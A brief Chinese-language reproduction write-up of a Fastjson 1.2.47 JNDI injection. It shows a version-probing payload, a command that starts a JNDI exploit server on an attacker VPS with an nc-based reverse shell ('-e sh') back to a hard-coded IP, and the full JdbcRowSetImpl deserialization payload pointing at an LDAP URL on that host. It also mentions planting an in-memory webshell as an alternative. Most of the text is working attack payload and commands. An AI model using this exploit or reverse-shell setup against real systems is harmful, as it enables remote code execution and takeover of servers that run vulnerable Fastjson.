1247-jndi

Fastjson 1247-jndi

复现过程

依旧是探测一下 fastjson 的版本，使用:

{
	"@type": "java.lang.AutoCloseable"

关于这种方式探测fastjosn版本，条件是需要response中会回显报错信息，但实际环境可能存在不回显的情况，那就需要利用其他手段了

那么已知fastjson版本为1.2.47，那么我们就可以尝试利用fastjson的JNDI特性来执行命令了。

这次使用的是 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具来执行命令。

在 vps 上开启服务：

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C " 47.113.221.99 8080  -e sh" -A 47.113.221.99

paylaod：

{"@type":"com.alibaba.fastjson.JSONObject",{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://47.113.221.99:1389/4ardp9",
        "autoCommit":true
    }
}}""}

这里他是没有 bash 的，所以使用 nc 来反弹命令，这里我 sh 也弹不出来。当然这里打一个内存马也是可以的。